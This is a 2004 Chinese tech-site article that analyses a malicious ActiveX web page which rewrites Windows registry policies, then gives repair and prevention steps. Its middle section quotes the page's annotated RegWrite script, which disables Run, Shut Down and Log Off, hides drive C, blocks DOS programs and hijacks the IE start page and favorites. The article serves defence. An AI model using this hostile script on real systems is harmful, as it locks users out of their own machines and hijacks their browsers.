您的位置:首页精文荟萃软件资讯 → 浏览网页注册表被修改之迷及解决办法

浏览网页注册表被修改之迷及解决办法

时间:2004/10/8 13:19:00来源:本站整理作者:蓝点我要评论(0)

浏览网页会被修改注册表?千真万确!如果你去浏览过下面的网页:http://www.某某.com/default.htm ,你真有生不如死的感觉!

 

进入该网页会被:

 

1.修改开始菜单

 

1)禁止“关闭系统”
2)禁止“运行”
3)禁止“注销”

 

2.隐藏C盘——你的C盘找不到了

 

3.禁止使用注册表编辑器regedit

 

4.禁止使用DOS程序

 

5.使系统无法进入“实模式”

 

6.禁止运行任何程序

 

7.将IE浏览器的首页改为http://www.某某.com/,收藏夹中也被加入该网址。

 

那么这些功能恐怖的功能是如何实现的呢?原来,该网页是有人利用Java技术制作的含有有害代码的ActiveX网页文件。为让更多的人了解其危害,我查看了其源代码,将其主要部分列了出来,并加了详细的注释(文中有“注”字的部分是我加的注释)。

 

注:下面代码是将你的IE默认连接首页改为http://www.某某.com/
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\
Start Page", "http://www.某某.com/");

 

注:以下是该网页修改受害者的注册表项所用的招数

 

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion
\\Policies\\Explorer\\NoRun", 01, "REG_BINARY");
注:使受害者系统没有“运行”项,这样用户就不能通过注册表编辑器来修改该有害网页对系统注册表的修改。

 

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
Policies\\Explorer\\NoClose", 01, "REG_BINARY");
注:使受害者系统没有“关闭系统”项

 

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
Policies\\Explorer\\NoLogOff", 01, "REG_BINARY");
注:使受害者系统没有“注销”项

 

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
Policies\\Explorer\\NoDrives", "00000004", "REG_DWORD");
注:使受害者系统没有逻辑驱动器C

 

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
Policies\\WinOldApp\\ Disabled","REG_BINARY");
注:禁止运行所有的DOS应用程序;

 

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
Policies\ \WinOldApp\\NoRealMode","REG_BINARY");
注:使系统不能启动到“实模式”(传统的DOS模式)下;

 

又注:进入该网页,它还会修改以下的注册表项,使WINDOWS系统登录时显示一个登录窗口(在MicroSoft网络用户登录之前)

 

Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\
Winlogon\\LegalNoticeCaption", "呜啦啦...");
注:这些代码会使窗口的标题是“呜啦啦…”

 

Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\
Winlogon\\LegalNoticeText", "欢迎你!你这个超级无敌大白痴!《呜啦啦...》故事开始了,按确定进入悲惨世界");
注:上面一行是会在窗口中显示出来的文字

 

注:下面两行代码修改注册表,使受害者所有的IE窗口都加上以下的标题:“呜啦啦…”

 

Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\
Window Title", "呜啦啦...");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\
Window Title", "呜啦啦...");
注:到上面一行为止,完成了对受害者的注册表的所有修改!

 

注:下面代码用来将其网页增加到受害者的收藏夹中

 

var WF, Shor, loc;
WF = FSO.GetSpecialFolder(0);
loc = WF + "\\Favorites";
if(!FSO.FolderExists(loc))
{
loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\
" + Net.UserName + "\\Favorites";
if(!FSO.FolderExists(loc))
{
return;
}
}

 

注:下面就是使其网页加入到你的收藏夹的具体代码
AddFavLnk(loc, "找到感觉www.某某.com", "http://www.某某.com");

 

由于代码很简单,又加了注释,相信你已经看明白是怎么回事了。那么如果不小心进入该网页,并且已经中招了该怎么办呢?别急,下面给你列出了解决的办法。

 

受害用户的修复方法:

 

1:对于Win9x用户,建议在电脑启动时按F8键,选择到MS-DOS方式下,使用Scanreg/restore命令来恢复以前备份的、正常的注册表。

 

2:对于Win2000用户,把以下内容copy下来,存为unlock.reg文件,选带命令行的安全模式,用命令regedit unlock.reg导入,如何重启机器就OK了。

 

unlock.reg文件内容如下:

 

Windows Registry Editor Version 5.00

 

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer]
"NoDriveTypeAutoRun"=dword:00000095
"NoRun"=hex:
"NoLogOff"=hex:
"NoDrives"=dword:00000000
"RestrictRun"=dword:00000000

 

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\System]
"DisableRegistryTools"=dword:00000000

 

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\System]
"DisableRegistryTools"=dword:00000000

 

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\WinOldApp]
"Disabled"=dword:00000000

 

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\WinOldApp]
"NoRealMode"=dword:00000000

 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Winlogon]
"LegalNoticeCaption"=""
"LegalNoticeText"=""

 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main]
"Window Title"="IE浏览器"

 

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Window Title"="IE浏览器"

 

预防办法:

 

1.要避免中招,关键是不要轻易去一些自己并不了解的站点。

 

2.在IE设置中将ActiveX插件和控件、Java脚本等全部禁止

 

3.可以通过升级到最新的病毒库,来预防该类恶意网页的侵害。

 

4.既然该网页是通过修改注册表来破坏我们的系统,那么我们可以事先把注册表加锁:禁止修改注册表,这样就可以达到预防的目的。不过,自己要使用注册表编辑器regedit.exe该怎么办呢?因此我们还要在此前事先准备一把“钥匙”,以便打开这把“锁”!

 

加锁方法如下:

 

(1)运行注册表编辑器regedit.exe;
(2)展开注册表到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\System下,新建一个名为DisableRegistryTools的DWORD值,并将其值改为“1”,即可禁止使用注册表编辑器regedit.exe。

 

解锁方法如下:

 

用记事本编辑一个任意名字的.reg文件,比如unlock.reg,内容如下:

 

REGEDIT4

 

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\System]
"DisableRegistryTools"=dword:00000000

 

存盘。你就有了一把解锁的钥匙了!如果要使用注册表编辑器,则双击unlock.reg即可。要注意的是,在“REGEDIT4”后面一定要空一行,并且“REGEDIT4”中的“4”和“T”之间一定不能有空格,否则将前功尽弃!

 

说明:对于“万花谷”网页的恶意代码带来的破坏,也可按上面所提的方法来预防,中招后也可参考上面的方法解决。另,KV3000对“万花谷”可完全恢复,对本文介绍的网页破坏系统现象,则无法安全恢复。

 

相关阅读 Windows错误代码大全 Windows错误代码查询激活windows有什么用Mac QQ和Windows QQ聊天记录怎么合并 Mac QQ和Windows QQ聊天记录Windows 10自动更新怎么关闭 如何关闭Windows 10自动更新windows 10 rs4快速预览版17017下载错误问题Win10秋季创意者更新16291更新了什么 win10 16291更新内容windows10秋季创意者更新时间 windows10秋季创意者更新内容kb3150513补丁更新了什么 Windows 10补丁kb3150513是什么

文章评论
发表评论

热门文章 360快剪辑怎么使用 36金山词霸如何屏幕取词百度收购PPS已敲定!3

最新文章 微信3.6.0测试版更新了微信支付漏洞会造成哪 360快剪辑怎么使用 360快剪辑软件使用方法介酷骑单车是什么 酷骑单车有什么用Apple pay与支付宝有什么区别 Apple pay与贝贝特卖是正品吗 贝贝特卖网可靠吗

人气排行 xp系统停止服务怎么办?xp系统升级win7系统方电脑闹钟怎么设置 win7电脑闹钟怎么设置office2013安装教程图解:手把手教你安装与qq影音闪退怎么办 QQ影音闪退解决方法VeryCD镜像网站逐个数,电驴资料库全集同步推是什么?同步推使用方法介绍QQ2012什么时候出 最新版下载EDiary——一款好用的电子日记本